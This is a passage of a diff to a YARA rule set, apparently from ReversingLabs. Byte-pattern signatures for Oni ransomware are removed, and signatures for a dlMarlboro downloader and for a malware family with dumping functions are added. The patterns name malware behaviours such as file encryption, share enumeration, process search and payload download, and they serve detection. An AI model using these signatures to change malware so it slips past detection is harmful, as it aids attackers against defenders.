?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 - 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D - ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? - ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? - ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 - ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 - ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B FF 56 57 - 8B F9 8B 37 EB ?? FF 36 E8 ?? ?? ?? ?? 59 83 C6 ?? 3B 77 ?? 75 ?? FF 37 E8 ?? ?? ?? - ?? 59 5F 5E C3 + $UPX_Decompression = { + 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ?? + 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75 } - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8B 75 ?? 8D 44 24 ?? 57 50 C6 44 - 24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8B - 44 24 ?? 81 E9 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 D8 ?? 6A ?? 6A ?? 50 51 FF 36 FF D7 - 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? - 81 BC 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 - D2 69 C0 ?? ?? ?? ?? 89 4C 24 ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? 83 C9 ?? 51 40 C7 - 44 24 ?? ?? ?? ?? ?? F7 F1 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 - C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 89 54 24 ?? 89 94 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? - ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 10 84 24 ?? ?? ?? ?? 6A ?? 6A ?? 0F - 11 84 24 ?? ?? ?? ?? 0F 57 C0 66 0F 13 44 24 ?? 8B 44 24 ?? 50 89 44 24 ?? 8B 44 24 - ?? 50 FF 36 89 44 24 ?? FF D7 6A ?? 8D 44 24 ?? 0F 57 C0 50 68 ?? ?? ?? ?? 8D 84 24 - ?? ?? ?? ?? 66 0F 13 44 24 ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 - C0 0F 84 + $UPX_Encrypting = { + 31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75 } - $encrypt_files_p2 = { - 6A ?? 6A ?? FF 74 24 ?? 0F 11 84 24 ?? ?? ?? ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? - 6A ?? 8D 44 24 ?? 50 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? 8B - 84 24 ?? ?? ?? ?? 8B C8 85 C0 B8 ?? ?? ?? ?? 6A ?? 0F 44 C8 69 44 24 ?? ?? ?? ?? ?? - 33 D2 6A ?? 40 89 44 24 ?? F7 F1 8B 4C 24 ?? 33 C0 83 C2 ?? 13 C0 01 54 24 ?? 13 C8 - 8B 44 24 ?? 89 4C 24 ?? 0F A4 C1 ?? C1 E0 ?? 51 50 FF 36 89 4C 24 ?? 89 44 24 ?? FF - 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF - 15 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? C7 84 24 ?? ?? ?? - ?? ?? ?? ?? ?? 6A ?? 6A ?? FF D7 8B 35 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 89 44 24 ?? - FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? FF D7 50 FF D6 6A ?? 6A ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? FF D7 50 FF D6 + $dumping_functionv2014 = { + 55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 + ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ?? + 53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? + 56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A + ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4 + ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3 } - $encrypt_files_p3 = { - 6A ?? 6A ?? 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 36 FF 15 ?? ?? ?? ?? 6A ?? - 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 36 FF 15 ?? ?? ?? ?? C6 44 - 24 ?? ?? FF 36 FF 15 ?? ?? ?? ?? 80 7C 24 ?? ?? 74 ?? 68 ?? ?? ?? ?? 6A ?? 83 C6 ?? - 56 FF 15 ?? ?? ?? ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 8B 75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 + $dumping_functionMidVersion = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 + DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A + D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? + ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? + ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? + ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89 + 59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? + 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A + ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 + C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? + ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55 + ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B + 4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0 + 5B E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $dumping_functionE = { + 52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 + 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF + 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 + } + $dumping_functionP = { + 50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56 + 89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF + ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A + ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ?? + FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15 + } + $dumping_functionB = { + 52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 + 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? + ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? + ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4 + 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 + ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? E8 + } + $dumping_function111 = { + 68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB + ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? + ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 + } + $dumping_function2 = { + 55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D + ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + 83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83 + C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0 + 8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D + ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B + E5 5D C2 + } + $lib_loader = { + 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? + ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 + } + $exception1 = { + B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08 + } + $exception2 = { + 55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ?? + 6A ?? 8B 4B ?? 03 CA 8B 01 FF D0 + } + $exceptionallock = { + B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ?? + 2B CA 89 4A ?? 33 C0 C3 } condition: - uint16(0)==0x5A4D and ( all of ($enum_shares_p*)) and ($find_files) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and $payload and ($NSIS_CheckIntegrity or ($UPX_Decompression and $UPX_Encrypting) or $NSIS_ErrorPart or $dumping_functionv2014 or $dumping_functionMidVersion or ($exception1 and $exception2 and $exceptionallock) or $dumping_functionP or $dumping_functionE or $dumping_functionB or $dumping_function111 or $dumping_function2 or $lib_loader) } -rule REVERSINGLABS_Win32_Ransomware_ONI : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Oni ransomware." + description = "Yara rule that detects dlMarlboro downloader." author = "ReversingLabs" - id = "9190aee2-1119-546e-82ca-a7aba44a9d7f" - date = "2024-09-08" - date = "2024-09-08" - modified = "2020-12-07" + id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c" + date = "2020-07-23" + modified = "2020-07-23" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Oni.yara#L1-L82" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "685abf5a5edba5bae19faaf6521ce617370cdab1404fe84d846e82a60182dfff" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_factor = 5 + tc_detection_type = "Downloader" + tc_detection_name = "dlMarlboro" + tc_detection_factor = 3 importance = 25 strings: - $find_files = { - 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - 8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? - 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? - ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8B D4 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 - ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 90 8A 01 41 84 - C0 75 ?? 2B CE 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? - ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? - ?? ?? C7 41 ?? ?? ?? ?? ?? 50 C6 01 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF - 15 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 - ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? - 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 F8 ?? 72 - ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 75 ?? 8B 41 ?? 3B C1 73 ?? 2B C8 83 F9 - ?? 72 ?? 83 F9 ?? 77 ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 - ?? ?? ?? ?? 8B E5 5D C3 + $ping_apnic = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 + 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57 + C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? + 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 } - $encrypt_files = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 68 - ?? ?? ?? ?? 6A ?? 33 F6 89 55 ?? 56 56 50 89 4D ?? 89 75 ?? FF D7 85 C0 75 ?? 68 ?? - ?? ?? ?? 6A ?? 50 50 8D 45 ?? 50 FF D7 8B 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8D 45 ?? - 89 75 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 - DB 74 ?? 8D 45 ?? 50 6A ?? 6A ?? FF 75 ?? 53 57 FF 15 ?? ?? ?? ?? 53 6A ?? FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? - 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 89 01 53 FF 15 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? - 5B 8B 4D ?? 8B C6 5F 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + $download_bin_1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ?? + ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? + ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01 + ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? + E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 + 05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B + C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 + ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 + ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? + ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 + 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? + ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? + ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB } - $search_processes = { - 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? - ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 B9 - ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 44 24 ?? ?? 8D 84 24 ?? ?? ?? ?? FF 74 24 ?? C7 05 ?? - ?? ?? ?? ?? ?? ?? ?? 50 8D 44 24 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 05 ?? ?? ?? - ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 83 EE ?? 4F 83 7E - ?? ?? 72 ?? 8B 1E 8B CE 56 E8 ?? ?? ?? ?? 8B 46 